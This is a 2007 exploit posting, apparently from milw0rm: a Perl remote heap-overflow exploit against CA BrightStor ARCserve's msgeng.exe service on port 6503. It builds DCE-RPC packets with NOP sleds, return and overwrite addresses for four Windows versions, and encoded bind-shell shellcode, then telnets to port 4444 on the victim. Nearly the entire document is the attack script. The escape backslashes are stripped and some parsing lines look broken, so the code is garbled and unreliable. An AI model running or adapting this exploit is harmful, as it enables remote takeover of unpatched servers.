CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2 :

Date : 2007-01-28 Author : Jacopo Cervini
#!/usr/bin/perl
# 
# original exploit by lssec.com this is a perl porting
# 
# acaro [at] jervus.it


use IO::Socket::INET;
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------
";
print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress
";
print " Return address: 
";
print " 1 - Windows 2k Sp4 English Version
";
print " 2 - Windows 2k Sp4 Italian Version
";
print " 3 - Windows XP Pro Sp1 English Version
";
print " 4 - Windows XP Pro Sp0 English Version
";
print " If values not specified, Windows 2k Sp4 will be used.
";
print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1 -o1
";
print "--------------------------------------------------------------------
";
}

use IO::Socket::INET;

my $host = 10.0.0.2;
my $port = 6503;
my $reply;
my $request;
my $jmp="xebx0ax90x90";	# JMP over ret and uef to our shellcode




foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*).(.*).(.*).(.*))/);
$uef = $1 if ($_=~/-o(.*)/);
$ret = $1 if ($_=~/-o(.*)/);
}




switch ($uef) {
case 1 { $uef="x4cx14x54x7c" } # Win2k SP4 English version
case 2 { $uef="x4cx14x68x79" } # Win2k SP4 Italian  version
case 3 { $uef="xb4x73xedx77" } # WinXP Pro English SP1 version
case 4 { $uef="xb4x63xedx77" } # WinXP Pro English SP0 version
}

switch ($ret) {
case 1 { $ret="xbfx75x40x2d" } # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll
case 2 { $ret="xbfx75x40x2d" } # Win2k SP4 Italian  version CALL DWORD PTR DS:[ESI+48] in qclient.dll
case 3 { $ret="x52xbfx04x78" } # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
case 4 { $ret="xd7xe9xd0x77" } # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
}




my $shellcode  =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe0".
"x00x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f".
"xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexaf".
"xb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbAxbbxbcxbdxbexbf".
"xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcf".
"xd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf".
"xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexef".
"xf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff".
"x1fxb9x85x79x86x07xd0x18x88x18x90x18xbfx3bx1cxfa".
"x88xa4x0exd6xdbx3fx1cxfcxbfxe6x06x4cx61x82xebx28".
"xb5x05xe1xd5x30x07x3ax23x15xc2xb4xd5x36x3cxb0x79".
"xb3x3cxa0x79xa3x3cx1cxfax86x07xf2x76x86x3cx6axcb".
"x75x07x47x30x90xa8xb4xd5x36x05xf3x7bxb5x90x33x42".
"x44xc2xcdxc3xb7x90x35x79xb5x90x33x42x05x26x65x63".
"xb7x90x35x7axb4x3bxb6xd5x30xfcx8bxcdx99xa9x9ax7d".
"x1fxb9xb6xd5x30x09x89x4ex86x07x80x47x69x8ax89x7a".
"xb9x46x2fxa3x07x05xa7xa3x02x5ex23xd9x4ax91xa1x07".
"x1ex2dxcfxb9x6dx15xdbx81x4bxc4x8bx58x1exdcxf5xd5".
"x95x2bx1cxfcxbbx38xb1x7bxb1x3ex89x2bxb1x3exb6x7b".
"x1fxbfx8bx87x39x6ax2dx79x1fxb9x89xd5x1fx58x1cxfa".
"x6bx38x1fxa9x24x0bx1cxfcxb2x90x33x42x10xe5xe7x75".
"xb3x90x35xd5x30x6fxe3x2a";


my $uuid="x05".							#version
"x00".									#version minor
"x0b".									#packet bind
"x03".									#packet flag
"x10x00x00x00".							#data rapresentation
"x48x00".								#fragment length
"x00x00".								#auth length
"x01x00x00x00".							#call id
"xd0x16xd0x16".				
"x00x00x00x00".							#assoc group			
"x01x00x00x00x00x00x01x00".					
"xf0x6bx24xdcx7ax7axcex11x9fx88x00x80x5fxe4x38x38".	#uuid
"x01x00".								#interface ver
"x00x00".								#interface ver minor
"x04x5dx88x8axebx1cxc9x11x9fxe8x08x00x2bx10x48x60".	#transfer syntax
"x02x00x00x00";							#syntax ver

my $special="x05".							#version
"x00".									#version minor
"x00".									#packet type request
"x03".									#packet flags
"x10x00x00x00".							#data rapresentation
"x18x08".								#frag length
"x00x00".								#auth length
"x01x00x00x00".							#call id
"x00x08x00x00".							#alloc hint
"x00x00".								#contex id
"x2bx00";								#opnum 43




my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!
";


$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request
";
recv($socket, $reply, 1024, 0);


$request = $special.("x90"x680).$jmp.$ret.$uef.$shellcode.("x90"x1006)."
";
send $socket, $request, 0;
print "[+] Sent malicius 1st request
";


$request = $special.("x90"x680).$jmp.$ret.$uef.$shellcode.("x90"x1029)."
";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request
";



print " + Connect on 4444 port of $host ...
";
sleep(3);
system("telnet $host 4444");
exit;

# milw0rm.com [2007-01-28]

C1

 

C2

 

C3